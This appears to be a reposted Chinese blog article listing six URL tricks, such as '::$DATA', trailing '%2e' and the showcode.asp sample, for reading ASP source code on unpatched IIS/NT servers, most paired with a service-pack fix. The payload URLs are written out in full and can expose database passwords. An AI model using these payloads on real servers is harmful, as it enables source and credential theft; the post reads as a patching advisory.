思科网络

cncco.com

偷看ASP原码的6种方法

在没有打Services Pack6补丁的NT server上,至少有6种方法可以看到ASP程序
的源代码,它们是:

1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?
source=/msadc/Samples/SELECTOR/showcode.asp
解决方案:删除showcode.asp

2、http://somewhere/something.asp::$DATA
解决方案: 装sp3

3、http://somewhere/something.asp%2e
解决方案: 装sp4

or http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

4、http://somewhere/something%2e%41sp
或者 http://somewhere/something%2e%asp
解决方案: 装sp4

5、http://somewhere/something.asp%81
解决方案:装sp6或者打补丁

6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp

最大的危害莫过于asp文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;

阅读更多
文章标签: asp 数据库 server
个人分类: IIS ASP
想对作者说点什么? 我来说一句

偷看原码的6种方法

zgqtxwd zgqtxwd

2008-04-27 04:51:00

阅读数:135

QQ相册偷看器适合任何版本

2008年12月25日 254KB 下载

QQ聊天记录偷看器2007第五加强版

2008年01月06日 554KB 下载

小说阅读器 上班偷看小说利器

2013年08月20日 1.69MB 下载

ASP登录界面源代码

2011年04月28日 2KB 下载

淘客风云-淘宝客网站 ASP 源码

2010年02月22日 146KB 下载

没有更多推荐了,返回首页

不良信息举报

偷看ASP原码的6种方法

最多只允许输入30个字

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭